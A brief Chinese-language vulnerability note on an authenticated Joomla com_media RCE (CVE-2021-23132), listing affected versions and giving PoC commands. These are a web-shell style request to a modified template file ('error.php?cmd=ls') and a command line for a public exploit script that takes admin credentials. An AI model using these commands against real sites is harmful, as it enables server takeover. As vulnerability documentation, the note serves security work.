# Joomla com_media 后台 RCE (CVE-2021-23132)
影响版本:
Joomla core <=3.9.24 * CVE-2021-23132 com_media allowed paths that are not intended for image uploads to RCE. * CVE-2020-24597 Directory traversal in com_media to RCE 步骤: 获取超级管理员权限,触发RCE。 **PoC:** ``` http://target/templates/protostar/error.php?cmd=ls python3 cve-2021-23132.py -url http://192.168.72.140 -u admin -p 1234 -rce 1 -cmd ls ``` poc.py:https://github.com/HoangKien1020/CVE-2021-23132
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容